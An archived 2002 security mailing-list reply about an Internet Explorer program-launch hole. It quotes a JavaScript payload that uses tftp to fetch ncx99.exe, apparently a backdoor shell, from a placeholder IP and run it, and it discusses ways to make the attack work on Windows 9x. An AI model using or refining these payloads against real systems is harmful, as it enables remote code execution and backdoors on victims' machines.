Vulnerability Development mailing list archives
Re: Rather large MSIE-hole
From: NoCoNFLiC <nocon () castleblack darkflame net>
Date: Fri, 15 Mar 2002 09:30:12 -0600
[dotslash () snosoft com] Thu, Mar 14, 2002 at 04:56:50PM -0500 wrote:
Sorry if someone else has said this... but has anyone tryed using + as a space like you had to when using cmd.exe via unicode exploit? -KF Felipe Franciosi wrote:var programName=new Array( 'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe', 'c:/winnt/system32/ncx99.exe', );MS Windows 9x don't have trivial ftp client by default... I was thinking how this could be exploitable on these versions... The FTP client offers the option to read a text-file containing line separated commands. But I couldn't get to work something like: var prog... 'c:/command.com /c echo bin > c:/list.txt', 'c:/command.com /c echo GET something >> c:/list.txt' this won't create 'list.txt'... Any ideas why? Or how some could get around it?
agian, i haven't tried but maybe replace the space's with it's hex equiv "%20" ? -- - nocon ====================================== nocon () darkflame net http://nocon.darkflame.net ======================================
Current thread:
- Re: Disabling the MSIE hole., (continued)
- Re: Disabling the MSIE hole. Bob at firstcodings (Mar 13)
- RE: Disabling the MSIE hole. leon (Mar 13)
- Re: Disabling the MSIE hole. Magnus Bodin (Mar 13)
- Re: Rather large MSIE-hole Magnus Bodin (Mar 12)
- Re: Rather large MSIE-hole NyQuist (Mar 13)
- Re: Rather large MSIE-hole NoCoNFLiC (Mar 13)
- Re: Rather large MSIE-hole methodic (Mar 14)
- Re: Rather large MSIE-hole Felipe Franciosi (Mar 14)
- Re: Rather large MSIE-hole KF (Mar 14)
- Re: Rather large MSIE-hole jon schatz (Mar 14)
- Re: Rather large MSIE-hole NoCoNFLiC (Mar 15)
- Re: Rather large MSIE-hole NyQuist (Mar 13)
- Re: [Re: Rather large MSIE-hole] another variant (NAV and Finjan block this) David Barnett (Mar 16)
- Re: Rather large MSIE-hole Raul Dias (Mar 13)
- Re: Rather large MSIE-hole Syzop (Mar 14)
- RE: Rather large MSIE-hole Ryan Sweat (Mar 14)
- Re: Rather large MSIE-hole Keegan (Mar 14)